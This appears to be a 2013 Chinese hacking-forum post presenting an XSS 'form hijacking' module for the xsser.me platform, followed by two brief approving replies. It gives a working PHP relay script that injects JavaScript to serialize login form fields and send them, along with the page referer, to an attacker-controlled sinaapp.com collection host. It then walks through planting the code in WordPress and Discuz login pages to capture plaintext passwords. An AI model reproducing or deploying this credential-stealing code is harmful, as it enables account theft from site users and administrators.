C0dePlay Xss 通用记录明文(表单劫持)

admin · 发表于 2013-10-6 14:47:24

平台基于xsser.me for sae http://xsserme.sinaapp.com/download.php
模块编写

新建模块如下图

因为里面逻辑判断和数据转化较多需要个php脚本来转发

php转发脚本代码转发文件的源码为: <?php /** * @desc 转发文件 * @team C0dePlay Team * @author Yaseng WwW.Yaseng.Me [Yaseng@UAUC.NET] */ ini_set('display_errors', 'Off'); $id=$_GET['id']; if($_GET['y']){ $funcname=$_GET['funcname']; $formname='"'.$_GET['formname'].'"'; $formid='"'.$_GET['formid'].'"'; echo "
var  xurl='http://xxx.sinaapp.com/xxxxx/xform.php?id={$id}';
var form= ( $formname ) ?  document.forms[$formname] :  document.getElementById($formid);

"; if($funcname){ echo 'function getForm(e){var t,n="",r="",i,s;for(t=0;t<e.length;t++){i=e[t];
if(i.name!=""){if(i.type=="select-one")s=i.options[i.selectedIndex].value;else if(i.type=="checkbox"
||i.type=="radio"){if(i.checked==0)continue;s=i.value}else{if(i.type=="button"||i.type=="submit"
||i.type=="reset"||i.type=="image")continue;s=i.value}s=encodeURIComponent(s),n+=r+i.name+"="+s,r="&"}}return n} '."
   $funcname=xss.proxy($funcname,function(){
            xss.ajax(xurl,getForm(form));

         })" ;

}else{ echo 'xss.xform(form,xurl);';

}

}else{ $url=$_SERVER['HTTP_REFERER']; $data=""; foreach($_REQUEST as $k=>$v){ $data.="|$k=$v";

  }

file_get_contents("http://xxx.sinaapp.com/index.php?do=api&id={$id}&data={$data}&url={$url}");

} ?>

注:里面javascript代码基于 xss.js库地址:http://pujun.li/xss.js sogili

使用演示一:普通表单提交 (wordpress 示范)

利用表单劫持实现
第一步:新建项目选择 xss.js模块和通用明文记录填写配置
以wordpress为例看后台登陆表单:

第二步:插入xss 代码 wp-login.php
第三步:爆菊

ajax提交表单 (discuz 示范)

利用函数劫持实现
第一步:新建项目选择 xss.js模块和通用明文记录填写配置
以discuz 为例看登陆表单:

http://w/uauc/dg2.5/member.php?mod=logging&action=login

创建项目

演示视频

视频地址: http://v.youku.com/v_show/id_XNTY0NTk1NzY0.html (可选择高清全屏观看)
高清无码: http://pan.baidu.com/share/link?shareid=484431&uk=587894688

后言

Xsser 程序确实比较强大,本文只是抛砖引玉,大家可以参考本文diy各种猥琐模块…

显示全部楼层 · 发表于 2013-10-6 14:48:10

真是收益匪浅

显示全部楼层 · 发表于 2013-10-6 15:24:06

路过，支持一下啦

C0dePlay Xss 通用记录明文(表单劫持)

浏览过的版块